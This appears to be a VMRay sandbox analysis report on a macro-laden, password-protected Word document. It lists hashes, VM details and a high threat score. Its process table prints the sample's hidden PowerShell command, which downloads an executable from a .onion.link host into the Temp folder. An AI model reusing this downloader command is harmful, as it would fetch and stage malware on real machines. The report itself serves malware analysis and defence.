Password Protected Microsoft Word Document Analysis | VMRay Analyzer Report
Try VMRay Analyzer
Analysis Information
Creation Time 2017-07-25 14:13 (UTC+2)
VM Analysis Duration Time 00:02:38
Execution Successful True
Sample Filename 3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64.doc
Command Line Parameters False
Prescript False
Number of Processes 5
Document Password 5558
Termination Reason Timeout
Download Archive Function Logfile Generic Logfile PCAP
VTI Information
VTI Score
92 / 100
VTI Database Version 2.6
VTI Rule Match Count 11
VTI Rule Type Documents
Tags
The tags feature is only available in the fully licensed version of VMRay Analyzer.
Screenshots
Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot
Monitored Processes
Process Graph


ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x944 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
#2 0xa08 Child Process Medium cmd.exe cmd /c C:\Users\HJRD1K~1\AppData\Local\Temp\test.bat #1
#3 0xa20 Child Process Medium powershell.exe powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')" #2
#4 0x818 Child Process Medium timeout.exe TIMEOUT /t 20 /nobreak #2
#5 0x938 Child Process Medium powershell.exe powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')" #2
Sample Information
ID #2023430
MD5 Hash Value 52ecd34af06455f0cd252661db1ab097
SHA1 Hash Value 50011011d34e3bcd80672cc91de8c6bd5a2be52e
SHA256 Hash Value 3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64
Filename 3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64.doc
File Size 25.50 KB (26112 bytes)
File Type Word Document
Has VBA Macros True
Analyzer and Virtual Machine Information
Analyzer Version 2.1.0
Analyzer Build Date 2017-07-24 15:33
Microsoft Office Version 2013
Microsoft Word Version 15.0.4420.1017
Internet Explorer Version 8.0.7601.17514
Firefox Version 39.0
Java Version 8.0.1010.13
VM Name win7_64_sp1-mso2013
VM Architecture x86 64-bit
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image